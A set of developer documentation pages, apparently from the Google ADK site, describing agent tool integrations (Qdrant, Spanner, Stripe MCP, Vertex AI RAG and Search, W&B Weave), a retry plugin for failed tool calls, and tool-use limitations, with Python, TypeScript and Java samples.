## Configuration

The Qdrant MCP server can be configured using environment variables:

| Variable                 | Description                                            | Default                                  |
| ------------------------ | ------------------------------------------------------ | ---------------------------------------- |
| `QDRANT_URL`             | URL of the Qdrant server                               | `None` (required)                        |
| `QDRANT_API_KEY`         | API key for Qdrant Cloud authentication                | `None`                                   |
| `COLLECTION_NAME`        | Name of the collection to use                          | `None`                                   |
| `QDRANT_LOCAL_PATH`      | Path for local persistent storage (alternative to URL) | `None`                                   |
| `EMBEDDING_MODEL`        | Embedding model to use                                 | `sentence-transformers/all-MiniLM-L6-v2` |
| `EMBEDDING_PROVIDER`     | Provider for embeddings (`fastembed` or `ollama`)      | `fastembed`                              |
| `TOOL_STORE_DESCRIPTION` | Custom description for the store tool                  | Default description                      |
| `TOOL_FIND_DESCRIPTION`  | Custom description for the find tool                   | Default description                      |

### Custom tool descriptions

You can customize the tool descriptions to guide the agent's behavior:

```python
env={
    "QDRANT_URL": "http://localhost:6333",
    "COLLECTION_NAME": "code-snippets",
    "TOOL_STORE_DESCRIPTION": "Store code snippets with descriptions. The 'information' parameter should contain a description of what the code does, while the actual code should be in 'metadata.code'.",
    "TOOL_FIND_DESCRIPTION": "Search for relevant code snippets using natural language. Describe the functionality you're looking for.",
}
```

## Additional resources

- [Qdrant MCP Server Repository](https://github.com/qdrant/mcp-server-qdrant)
- [Qdrant Documentation](https://qdrant.tech/documentation/)
- [Qdrant Cloud](https://cloud.qdrant.io/)

# Reflect and Retry plugin for ADK

Supported in ADK: Python v1.16.0

The Reflect and Retry plugin can help your agent recover from error responses from ADK [Tools](/adk-docs/tools-custom/) and automatically retry the tool request. This plugin intercepts tool failures, provides structured guidance to the AI model for reflection and correction, and retries the operation up to a configurable limit.
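The intercept, reflect, and retry cycle described above can be pictured with a small plain-Python sketch. This is not the plugin's implementation: `call_with_reflection` and `revise_args` are hypothetical names used only for illustration, and in ADK the model, not a callback, proposes the corrected tool call.

```python
from typing import Any, Callable


def call_with_reflection(
    tool: Callable[..., Any],
    args: dict,
    revise_args: Callable[[dict, Exception], dict],
    max_retries: int = 3,
) -> Any:
    """Call `tool`; on failure, let `revise_args` propose new arguments and retry."""
    attempt = 0
    while True:
        try:
            return tool(**args)
        except Exception as error:
            # Give up once the retry budget is spent and surface the last error.
            if attempt >= max_retries:
                raise
            attempt += 1
            # "Reflection" step: derive corrected arguments from the failure.
            args = revise_args(args, error)


def reciprocal(x: float) -> float:
    return 1 / x


def bump(args: dict, error: Exception) -> dict:
    # Toy stand-in for the model's correction: nudge x away from zero.
    return {"x": args["x"] + 1}


print(call_with_reflection(reciprocal, {"x": 0}, bump))  # 1.0
```

The first call fails with `ZeroDivisionError`, the revision step changes the argument, and the second call succeeds. With `max_retries=0` the original error would propagate unchanged.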
This plugin can help you build more resilience into your agent workflows, including the following capabilities:

- **Concurrency safe**: Uses locking to safely handle parallel tool executions.
- **Configurable scope**: Tracks failures per invocation (default) or globally.
- **Granular tracking**: Failure counts are tracked per tool.
- **Custom error extraction**: Supports detecting errors in normal tool responses.

## Add Reflect and Retry Plugin

Add this plugin to your ADK workflow by adding it to the plugins setting of your ADK project's App object, as shown below:

```python
from google.adk.apps.app import App
from google.adk.plugins import ReflectAndRetryToolPlugin

app = App(
    name="my_app",
    root_agent=root_agent,
    plugins=[
        ReflectAndRetryToolPlugin(max_retries=3),
    ],
)
```

With this configuration, if any tool called by an agent returns an error, the request is updated and tried again, up to a maximum of 3 attempts, per tool.

## Configuration settings

The Reflect and Retry Plugin has the following configuration options:

- **`max_retries`**: (optional) Total number of additional attempts the system makes to receive a non-error response. Default value is 3.
- **`throw_exception_if_retry_exceeded`**: (optional) If set to `False`, the system does not raise an error if the final retry attempt fails. Default value is `True`.
- **`tracking_scope`**: (optional)
  - **`TrackingScope.INVOCATION`**: Track tool failures across a single invocation and user. This value is the default.
  - **`TrackingScope.GLOBAL`**: Track tool failures across all invocations and all users.

### Advanced configuration

You can further modify the behavior of this plugin by extending the `ReflectAndRetryToolPlugin` class.
The following code sample demonstrates a simple extension of the behavior by selecting responses with an error status:

```python
from google.adk.plugins import ReflectAndRetryToolPlugin


class CustomRetryPlugin(ReflectAndRetryToolPlugin):
    async def extract_error_from_result(self, *, tool, tool_args, tool_context, result):
        # Detect error based on response content
        if result.get('status') == 'error':
            return result
        return None  # No error detected


# add this modified plugin to your App object:
error_handling_plugin = CustomRetryPlugin(max_retries=5)
```

## Next steps

For complete code samples using the Reflect and Retry plugin, see the following:

- [Basic](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_reflect_tool_retry/basic) code sample
- [Hallucinating function name](https://github.com/google/adk-python/tree/main/contributing/samples/plugin_reflect_tool_retry/hallucinating_func_name) code sample

# Google Cloud Spanner tool for ADK

Supported in ADK: Python v1.11.0

This set of tools provides integration with Spanner:

- **`list_table_names`**: Fetches table names present in a GCP Spanner database.
- **`list_table_indexes`**: Fetches table indexes present in a GCP Spanner database.
- **`list_table_index_columns`**: Fetches table index columns present in a GCP Spanner database.
- **`list_named_schemas`**: Fetches the named schemas of a Spanner database.
- **`get_table_schema`**: Fetches Spanner database table schema and metadata information.
- **`execute_sql`**: Runs a SQL query in a Spanner database and fetches the result.
- **`similarity_search`**: Runs a similarity search in Spanner using a text query.

They are packaged in the toolset `SpannerToolset`.

```py
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import asyncio

from google.adk.agents import Agent
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
# from google.adk.sessions import DatabaseSessionService
from google.adk.tools.google_tool import GoogleTool
from google.adk.tools.spanner import query_tool
from google.adk.tools.spanner.settings import SpannerToolSettings
from google.adk.tools.spanner.settings import Capabilities
from google.adk.tools.spanner.spanner_credentials import SpannerCredentialsConfig
from google.adk.tools.spanner.spanner_toolset import SpannerToolset
from google.genai import types
from google.adk.tools.tool_context import ToolContext
import google.auth
from google.auth.credentials import Credentials

# Define constants for this example agent
AGENT_NAME = "spanner_agent"
APP_NAME = "spanner_app"
USER_ID = "user1234"
SESSION_ID = "1234"
GEMINI_MODEL = "gemini-2.5-flash"

# Define Spanner tool config with read capability set to allowed.
tool_settings = SpannerToolSettings(capabilities=[Capabilities.DATA_READ])

# Define a credentials config - in this example we are using application default
# credentials
# https://cloud.google.com/docs/authentication/provide-credentials-adc
application_default_credentials, _ = google.auth.default()
credentials_config = SpannerCredentialsConfig(
    credentials=application_default_credentials
)

# Instantiate a Spanner toolset
spanner_toolset = SpannerToolset(
    credentials_config=credentials_config, spanner_tool_settings=tool_settings
)


# Optional
# Create a wrapped function tool for the agent on top of the built-in
# `execute_sql` tool in the Spanner toolset.
# For example, this customized tool can perform a dynamically-built query.
def count_rows_tool(
    table_name: str,
    credentials: Credentials,  # GoogleTool handles `credentials`
    settings: SpannerToolSettings,  # GoogleTool handles `settings`
    tool_context: ToolContext,  # GoogleTool handles `tool_context`
):
    """Counts the total number of rows for a specified table.

    Args:
        table_name: The name of the table for which to count rows.

    Returns:
        The total number of rows in the table.
    """

    # Replace the following settings for a specific Spanner database.
    PROJECT_ID = ""
    INSTANCE_ID = ""
    DATABASE_ID = ""

    query = f"""
    SELECT count(*) FROM {table_name}
    """

    return query_tool.execute_sql(
        project_id=PROJECT_ID,
        instance_id=INSTANCE_ID,
        database_id=DATABASE_ID,
        query=query,
        credentials=credentials,
        settings=settings,
        tool_context=tool_context,
    )


# Agent Definition
spanner_agent = Agent(
    model=GEMINI_MODEL,
    name=AGENT_NAME,
    description=(
        "Agent to answer questions about Spanner database and execute SQL queries."
    ),
    instruction="""\
        You are a data assistant agent with access to several Spanner tools.
        Make use of those tools to answer the user's questions.
    """,
    tools=[
        spanner_toolset,
        # Add customized Spanner tool based on the built-in Spanner toolset.
        GoogleTool(
            func=count_rows_tool,
            credentials_config=credentials_config,
            tool_settings=tool_settings,
        ),
    ],
)

# Session and Runner
session_service = InMemorySessionService()
# Optionally, Spanner can be used as the Database Session Service for production.
# Note that it's suggested to use a dedicated instance/database for storing sessions.
# session_service_spanner_db_url = "spanner+spanner:///projects/PROJECT_ID/instances/INSTANCE_ID/databases/my-adk-session"
# session_service = DatabaseSessionService(db_url=session_service_spanner_db_url)

session = asyncio.run(
    session_service.create_session(
        app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID
    )
)
runner = Runner(
    agent=spanner_agent, app_name=APP_NAME, session_service=session_service
)


# Agent Interaction
def call_agent(query):
    """
    Helper function to call the agent with a query.
    """
    content = types.Content(role="user", parts=[types.Part(text=query)])
    events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    print("USER:", query)
    for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("AGENT:", final_response)


# Replace the Spanner database and table names below with your own.
call_agent("List all tables in projects//instances//databases/")
call_agent("Describe the schema of ")
call_agent("List the top 5 rows in ")
```

# Stripe MCP tool for ADK

Supported in ADK: Python, TypeScript

The [Stripe MCP Server](https://docs.stripe.com/mcp) connects your ADK agent to the [Stripe](https://stripe.com/) ecosystem. This integration gives your agent the ability to manage payments, customers, subscriptions, and invoices using natural language, enabling automated commerce workflows and financial operations.

## Use cases

- **Automate Payment Operations**: Create payment links, process refunds, and list payment intents through conversational commands.
- **Streamline Invoicing**: Generate and finalize invoices, add line items, and track outstanding payments without leaving your development environment.
- **Access Business Insights**: Query account balances, list products and prices, and search across Stripe resources to make data-driven decisions.

## Prerequisites

- Create a [Stripe account](https://dashboard.stripe.com/register)
- Generate a [Restricted API key](https://dashboard.stripe.com/apikeys) from the Stripe Dashboard

## Use with agent

Python, local MCP server:

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="stripe_agent",
    instruction="Help users manage their Stripe account",
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params=StdioServerParameters(
                    command="npx",
                    args=[
                        "-y",
                        "@stripe/mcp",
                        "--tools=all",
                        # (Optional) Specify which tools to enable
                        # "--tools=customers.read,invoices.read,products.read",
                    ],
                    env={
                        "STRIPE_SECRET_KEY": STRIPE_SECRET_KEY,
                    }
                ),
                timeout=30,
            ),
        )
    ],
)
```

Python, remote MCP server:

```python
from google.adk.agents import Agent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams

STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY"

root_agent = Agent(
    model="gemini-2.5-pro",
    name="stripe_agent",
    instruction="Help users manage their Stripe account",
    tools=[
        McpToolset(
            connection_params=StreamableHTTPServerParams(
                url="https://mcp.stripe.com",
                headers={
                    "Authorization": f"Bearer {STRIPE_SECRET_KEY}",
                },
            ),
        )
    ],
)
```

TypeScript, local MCP server:

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "stripe_agent",
  instruction: "Help users manage their Stripe account",
  tools: [
    new MCPToolset({
      type: "StdioConnectionParams",
      serverParams: {
        command: "npx",
        args: [
          "-y",
          "@stripe/mcp",
          "--tools=all",
          // (Optional) Specify which tools to enable
          // "--tools=customers.read,invoices.read,products.read",
        ],
        env: {
          STRIPE_SECRET_KEY: STRIPE_SECRET_KEY,
        },
      },
    }),
  ],
});

export { rootAgent };
```

TypeScript, remote MCP server:

```typescript
import { LlmAgent, MCPToolset } from "@google/adk";

const STRIPE_SECRET_KEY = "YOUR_STRIPE_SECRET_KEY";

const rootAgent = new LlmAgent({
  model: "gemini-2.5-pro",
  name: "stripe_agent",
  instruction: "Help users manage their Stripe account",
  tools: [
    new MCPToolset({
      type: "StreamableHTTPConnectionParams",
      url: "https://mcp.stripe.com",
      header: {
        Authorization: `Bearer ${STRIPE_SECRET_KEY}`,
      },
    }),
  ],
});

export { rootAgent };
```

Best practices

Enable human confirmation of tool actions and exercise caution when using the Stripe MCP server alongside other MCP servers to mitigate prompt injection risks.

## Available tools

| Resource      | Tool                          | API                     |
| ------------- | ----------------------------- | ----------------------- |
| Account       | `get_stripe_account_info`     | Retrieve account        |
| Balance       | `retrieve_balance`            | Retrieve balance        |
| Coupon        | `create_coupon`               | Create coupon           |
| Coupon        | `list_coupons`                | List coupons            |
| Customer      | `create_customer`             | Create customer         |
| Customer      | `list_customers`              | List customers          |
| Dispute       | `list_disputes`               | List disputes           |
| Dispute       | `update_dispute`              | Update dispute          |
| Invoice       | `create_invoice`              | Create invoice          |
| Invoice       | `create_invoice_item`         | Create invoice item     |
| Invoice       | `finalize_invoice`            | Finalize invoice        |
| Invoice       | `list_invoices`               | List invoices           |
| Payment Link  | `create_payment_link`         | Create payment link     |
| PaymentIntent | `list_payment_intents`        | List PaymentIntents     |
| Price         | `create_price`                | Create price            |
| Price         | `list_prices`                 | List prices             |
| Product       | `create_product`              | Create product          |
| Product       | `list_products`               | List products           |
| Refund        | `create_refund`               | Create refund           |
| Subscription | `cancel_subscription` | Cancel subscription | | Subscription | `list_subscriptions` | List subscriptions | | Subscription | `update_subscription` | Update subscription | | Others | `search_stripe_resources` | Search Stripe resources | | Others | `fetch_stripe_resources` | Fetch Stripe object | | Others | `search_stripe_documentation` | Search Stripe knowledge | ## Additional resources - [Stripe MCP Server Documentation](https://docs.stripe.com/mcp) - [Stripe MCP Server on GitHub](https://github.com/stripe/ai/tree/main/tools/modelcontextprotocol) - [Build on Stripe with LLMs](https://docs.stripe.com/building-with-llms) - [Add Stripe to your agentic workflows](https://docs.stripe.com/agents) # Vertex AI RAG Engine tool for ADK Supported in ADKPython v0.1.0Java v0.2.0 The `vertex_ai_rag_retrieval` tool allows the agent to perform private data retrieval using Vertex AI RAG Engine. When you use grounding with Vertex AI RAG Engine, you need to prepare a RAG corpus beforehand. Please refer to the [RAG ADK agent sample](https://github.com/google/adk-samples/blob/main/python/agents/RAG/rag/shared_libraries/prepare_corpus_and_data.py) or [Vertex AI RAG Engine page](https://cloud.google.com/vertex-ai/generative-ai/docs/rag-engine/rag-quickstart) for setting it up. Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/). ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. import os from google.adk.agents import Agent from google.adk.tools.retrieval.vertex_ai_rag_retrieval import VertexAiRagRetrieval from vertexai.preview import rag from dotenv import load_dotenv from .prompts import return_instructions_root load_dotenv() ask_vertex_retrieval = VertexAiRagRetrieval( name='retrieve_rag_documentation', description=( 'Use this tool to retrieve documentation and reference materials for the question from the RAG corpus,' ), rag_resources=[ rag.RagResource( # please fill in your own rag corpus # here is a sample rag corpus for testing purpose # e.g. projects/123/locations/us-central1/ragCorpora/456 rag_corpus=os.environ.get("RAG_CORPUS") ) ], similarity_top_k=10, vector_distance_threshold=0.6, ) root_agent = Agent( model='gemini-2.0-flash-001', name='ask_rag_agent', instruction=return_instructions_root(), tools=[ ask_vertex_retrieval, ] ) ``` # Vertex AI Search tool for ADK Supported in ADKPython v0.1.0 The `vertex_ai_search_tool` uses Google Cloud Vertex AI Search, enabling the agent to search across your private, configured data stores (e.g., internal documents, company policies, knowledge bases). This built-in tool requires you to provide the specific data store ID during configuration. For further details of the tool, see [Understanding Vertex AI Search grounding](/adk-docs/grounding/vertex_ai_search_grounding/). Warning: Single tool per agent limitation This tool can only be used ***by itself*** within an agent instance. For more information about this limitation and workarounds, see [Limitations for ADK tools](/adk-docs/tools/limitations/#one-tool-one-agent). ```py # Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from google.adk.tools import VertexAiSearchTool # Replace with your Vertex AI Search Datastore ID, and respective region (e.g. us-central1 or global). # Format: projects//locations//collections/default_collection/dataStores/ DATASTORE_PATH = "DATASTORE_PATH_HERE" # Constants APP_NAME_VSEARCH = "vertex_search_app" USER_ID_VSEARCH = "user_vsearch_1" SESSION_ID_VSEARCH = "session_vsearch_1" AGENT_NAME_VSEARCH = "doc_qa_agent" GEMINI_2_FLASH = "gemini-2.0-flash" # Tool Instantiation # You MUST provide your datastore ID here. vertex_search_tool = VertexAiSearchTool(data_store_id=DATASTORE_PATH) # Agent Definition doc_qa_agent = LlmAgent( name=AGENT_NAME_VSEARCH, model=GEMINI_2_FLASH, # Requires Gemini model tools=[vertex_search_tool], instruction=f"""You are a helpful assistant that answers questions based on information found in the document store: {DATASTORE_PATH}. Use the search tool to find relevant information before answering. If the answer isn't in the documents, say that you couldn't find the information. 
""", description="Answers questions using a specific Vertex AI Search datastore.", ) # Session and Runner Setup session_service_vsearch = InMemorySessionService() runner_vsearch = Runner( agent=doc_qa_agent, app_name=APP_NAME_VSEARCH, session_service=session_service_vsearch ) # Agent Interaction Function async def call_vsearch_agent_async(query): print("\n--- Running Vertex AI Search Agent ---") print(f"Query: {query}") if "DATASTORE_PATH_HERE" in DATASTORE_PATH: print("Skipping execution: Please replace DATASTORE_PATH_HERE with your actual datastore ID.") print("-" * 30) return # Session service methods are coroutines in current ADK Python releases, # so the session is created here with 'await' the first time it is needed. if await session_service_vsearch.get_session( app_name=APP_NAME_VSEARCH, user_id=USER_ID_VSEARCH, session_id=SESSION_ID_VSEARCH ) is None: await session_service_vsearch.create_session( app_name=APP_NAME_VSEARCH, user_id=USER_ID_VSEARCH, session_id=SESSION_ID_VSEARCH ) content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "No response received." try: async for event in runner_vsearch.run_async( user_id=USER_ID_VSEARCH, session_id=SESSION_ID_VSEARCH, new_message=content ): # Like Google Search, results are often embedded in the model's response.
if event.is_final_response() and event.content and event.content.parts: final_response_text = event.content.parts[0].text.strip() print(f"Agent Response: {final_response_text}") # You can inspect event.grounding_metadata for source citations if event.grounding_metadata: print(f" (Grounding metadata found with {len(event.grounding_metadata.grounding_attributions)} attributions)") except Exception as e: print(f"An error occurred: {e}") print("Ensure your datastore ID is correct and the service account has permissions.") print("-" * 30) # --- Run Example --- async def run_vsearch_example(): # Replace with a question relevant to YOUR datastore content await call_vsearch_agent_async("Summarize the main points about the Q2 strategy document.") await call_vsearch_agent_async("What safety procedures are mentioned for lab X?") # Execute the example # await run_vsearch_example() # Running locally due to potential colab asyncio issues with multiple awaits try: asyncio.run(run_vsearch_example()) except RuntimeError as e: if "cannot be called from a running event loop" in str(e): print("Skipping execution in running event loop (like Colab/Jupyter). Run locally.") else: raise e ``` # W&B Weave observability for ADK Supported in ADKPython [W&B Weave](https://weave-docs.wandb.ai/) provides a powerful platform for logging and visualizing model calls. By integrating Google ADK with Weave, you can track and analyze your agent's performance and behavior using OpenTelemetry (OTEL) traces. ## Prerequisites 1. Sign up for an account at [WandB](https://wandb.ai). 1. Obtain your API key from [WandB Authorize](https://wandb.ai/authorize). 1. 
Configure your environment with the required API keys: ```bash export WANDB_API_KEY= export GOOGLE_API_KEY= ``` ## Install Dependencies Ensure you have the necessary packages installed: ```bash pip install google-adk opentelemetry-sdk opentelemetry-exporter-otlp-proto-http ``` ## Sending Traces to Weave This example demonstrates how to configure OpenTelemetry to send Google ADK traces to Weave. ```python # math_agent/agent.py import base64 import os from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk from opentelemetry.sdk.trace.export import SimpleSpanProcessor from opentelemetry import trace from google.adk.agents import LlmAgent from google.adk.tools import FunctionTool from dotenv import load_dotenv load_dotenv() # Configure Weave endpoint and authentication WANDB_BASE_URL = "https://trace.wandb.ai" PROJECT_ID = "your-entity/your-project" # e.g., "teamid/projectid" OTEL_EXPORTER_OTLP_ENDPOINT = f"{WANDB_BASE_URL}/otel/v1/traces" # Set up authentication WANDB_API_KEY = os.getenv("WANDB_API_KEY") AUTH = base64.b64encode(f"api:{WANDB_API_KEY}".encode()).decode() OTEL_EXPORTER_OTLP_HEADERS = { "Authorization": f"Basic {AUTH}", "project_id": PROJECT_ID, } # Create the OTLP span exporter with endpoint and headers exporter = OTLPSpanExporter( endpoint=OTEL_EXPORTER_OTLP_ENDPOINT, headers=OTEL_EXPORTER_OTLP_HEADERS, ) # Create a tracer provider and add the exporter tracer_provider = trace_sdk.TracerProvider() tracer_provider.add_span_processor(SimpleSpanProcessor(exporter)) # Set the global tracer provider BEFORE importing/using ADK trace.set_tracer_provider(tracer_provider) # Define a simple tool for demonstration def calculator(a: float, b: float) -> str: """Add two numbers and return the result. 
Args: a: First number b: Second number Returns: The sum of a and b """ return str(a + b) calculator_tool = FunctionTool(func=calculator) # Create an LLM agent root_agent = LlmAgent( name="MathAgent", model="gemini-2.0-flash-exp", instruction=( "You are a helpful assistant that can do math. " "When asked a math problem, use the calculator tool to solve it." ), tools=[calculator_tool], ) ```

## View Traces in Weave dashboard

Once the agent runs, all its traces are logged to the corresponding project on [the Weave dashboard](https://wandb.ai/home). You can view a timeline of the calls that your ADK agent made during execution.

## Notes

- **Environment Variables**: Ensure your environment variables are correctly set for both WandB and Google API keys.
- **Project Configuration**: Replace `your-entity/your-project` in `PROJECT_ID` with your actual WandB entity and project name.
- **Entity Name**: You can find your entity name by visiting your [WandB dashboard](https://wandb.ai/home) and checking the **Teams** field in the left sidebar.
- **Tracer Provider**: It's critical to set the global tracer provider before using any ADK components to ensure proper tracing.

By following these steps, you can integrate Google ADK with Weave and get logging and visualization of your AI agents' model calls, tool invocations, and reasoning processes.

## Resources

- **[Send OpenTelemetry Traces to Weave](https://weave-docs.wandb.ai/guides/tracking/otel)** - Comprehensive guide on configuring OTEL with Weave, including authentication and advanced configuration options.
- **[Navigate the Trace View](https://weave-docs.wandb.ai/guides/tracking/trace-tree)** - Learn how to effectively analyze and debug your traces in the Weave UI, including understanding trace hierarchies and span details.
- **[Weave Integrations](https://weave-docs.wandb.ai/guides/integrations/)** - Explore other framework integrations and see how Weave can work with your entire AI stack.
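For the Weave setup above, the authentication header can be checked in isolation before any agent runs. The following is a minimal sketch using only the Python standard library; the helper name `build_weave_otlp_headers` and the sample key are hypothetical, while the `api:<key>` Basic-auth format and the `project_id` header are taken from the exporter example in this section.

```python
import base64


def build_weave_otlp_headers(api_key: str, project_id: str) -> dict[str, str]:
    """Build OTLP headers in the shape used by the exporter example (hypothetical helper)."""
    if not api_key:
        # An unset key would otherwise be encoded silently (for example as "api:None").
        raise ValueError("WANDB_API_KEY is empty; export it before starting the agent")
    token = base64.b64encode(f"api:{api_key}".encode()).decode()
    return {"Authorization": f"Basic {token}", "project_id": project_id}


if __name__ == "__main__":
    headers = build_weave_otlp_headers("example-key", "your-entity/your-project")
    scheme, token = headers["Authorization"].split(" ", 1)
    # Decode the token again to confirm what will be sent to the endpoint.
    print(scheme, base64.b64decode(token).decode())
```

Failing fast on an empty key is a design choice of this sketch: in the agent code above, `os.getenv("WANDB_API_KEY")` returns `None` when the variable is missing, and the f-string would still produce a header that the endpoint is likely to reject later.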
# Limitations for ADK tools Some ADK tools have limitations that can impact how you implement them within an agent workflow. This page lists these tool limitations and workarounds, if available. ## One tool per agent limitation ONLY for Search in ADK Python v1.15.0 and lower This limitation only applies to the use of Google Search and Vertex AI Search tools in ADK Python v1.15.0 and lower. ADK Python release v1.16.0 and higher provides a built-in workaround to remove this limitation. In general, you can use more than one tool in an agent, but use of specific tools within an agent excludes the use of any other tools in that agent. The following ADK Tools can only be used by themselves, without any other tools, in a single agent object: - [Code Execution](/adk-docs/tools/gemini-api/code-execution/) with Gemini API - [Google Search](/adk-docs/tools/gemini-api/google-search/) with Gemini API - [Vertex AI Search](/adk-docs/tools/google-cloud/vertex-ai-search/) For example, the following approach that uses one of these tools along with other tools, within a single agent, is ***not supported***: ```py root_agent = Agent( name="RootAgent", model="gemini-2.5-flash", description="Code Agent", tools=[custom_function], code_executor=BuiltInCodeExecutor() # <-- NOT supported when used with tools ) ``` ```java LlmAgent searchAgent = LlmAgent.builder() .model(MODEL_ID) .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool(), new YourCustomTool()) // <-- NOT supported .build(); ``` ### Workaround #1: AgentTool.create() method Supported in ADKPythonJava The following code sample demonstrates how to use multiple built-in tools or how to use built-in tools with other tools by using multiple agents: ```py from google.adk.tools.agent_tool import AgentTool from google.adk.agents import Agent from google.adk.tools import google_search from google.adk.code_executors import BuiltInCodeExecutor search_agent = Agent( model='gemini-2.0-flash', 
name='SearchAgent', instruction=""" You're a specialist in Google Search """, tools=[google_search], ) coding_agent = Agent( model='gemini-2.0-flash', name='CodeAgent', instruction=""" You're a specialist in Code Execution """, code_executor=BuiltInCodeExecutor(), ) root_agent = Agent( name="RootAgent", model="gemini-2.0-flash", description="Root Agent", tools=[AgentTool(agent=search_agent), AgentTool(agent=coding_agent)], ) ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.tools.AgentTool; import com.google.adk.tools.BuiltInCodeExecutionTool; import com.google.adk.tools.GoogleSearchTool; import com.google.common.collect.ImmutableList; public class NestedAgentApp { private static final String MODEL_ID = "gemini-2.0-flash"; public static void main(String[] args) { // Define the SearchAgent LlmAgent searchAgent = LlmAgent.builder() .model(MODEL_ID) .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool()) // Instantiate GoogleSearchTool .build(); // Define the CodingAgent LlmAgent codingAgent = LlmAgent.builder() .model(MODEL_ID) .name("CodeAgent") .instruction("You're a specialist in Code Execution") .tools(new BuiltInCodeExecutionTool()) // Instantiate BuiltInCodeExecutionTool .build(); // Define the RootAgent, which uses AgentTool.create() to wrap SearchAgent and CodingAgent BaseAgent rootAgent = LlmAgent.builder() .name("RootAgent") .model(MODEL_ID) .description("Root Agent") .tools( AgentTool.create(searchAgent), // Use create method AgentTool.create(codingAgent) // Use create method ) .build(); // Note: This sample only demonstrates the agent definitions. // To run these agents, you'd need to integrate them with a Runner and SessionService, // similar to the previous examples. 
System.out.println("Agents defined successfully:"); System.out.println(" Root Agent: " + rootAgent.name()); System.out.println(" Search Agent (nested): " + searchAgent.name()); System.out.println(" Code Agent (nested): " + codingAgent.name()); } } ```

### Workaround #2: bypass_multi_tools_limit

Supported in ADK: Python, Java

ADK Python has a built-in workaround that bypasses this limitation for `GoogleSearchTool` and `VertexAiSearchTool` (set `bypass_multi_tools_limit=True` to enable it), as shown in the [built_in_multi_tools](https://github.com/google/adk-python/tree/main/contributing/samples/built_in_multi_tools) sample agent.

Warning: Built-in tools cannot be used within a sub-agent, with the exception of `GoogleSearchTool` and `VertexAiSearchTool` in ADK Python because of the workaround mentioned above.

For example, the following approach that uses built-in tools within sub-agents is **not supported**: ```py url_context_agent = Agent( model='gemini-2.5-flash', name='UrlContextAgent', instruction=""" You're a specialist in URL Context """, tools=[url_context], ) coding_agent = Agent( model='gemini-2.5-flash', name='CodeAgent', instruction=""" You're a specialist in Code Execution """, code_executor=BuiltInCodeExecutor(), ) root_agent = Agent( name="RootAgent", model="gemini-2.5-flash", description="Root Agent", sub_agents=[ url_context_agent, coding_agent ], ) ``` ```java LlmAgent searchAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool()) .build(); LlmAgent codingAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("CodeAgent") .instruction("You're a specialist in Code Execution") .tools(new BuiltInCodeExecutionTool()) .build(); LlmAgent rootAgent = LlmAgent.builder() .name("RootAgent") .model("gemini-2.5-flash") .description("Root Agent") .subAgents(searchAgent, codingAgent) // Not supported, as the sub agents use built in tools.
.build(); ```

# Custom Tools for ADK

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

In an ADK agent workflow, Tools are programming functions with structured input and output that can be called by an ADK Agent to perform actions. ADK Tools function similarly to how you use a [Function Call](https://ai.google.dev/gemini-api/docs/function-calling) with Gemini or other generative AI models. You can perform various actions and programming functions with an ADK Tool, such as:

- Querying databases
- Making API requests (for example, getting weather data or calling booking systems)
- Searching the web
- Executing code snippets
- Retrieving information from documents (RAG)
- Interacting with other software or services

Before building your own Tools for ADK, check out the **[ADK Tools list](/adk-docs/tools/)** for pre-built tools you can use with ADK Agents.

## What is a Tool?

In the context of ADK, a Tool represents a specific capability provided to an AI agent, enabling it to perform actions and interact with the world beyond its core text generation and reasoning abilities. What distinguishes capable agents from basic language models is often their effective use of tools.

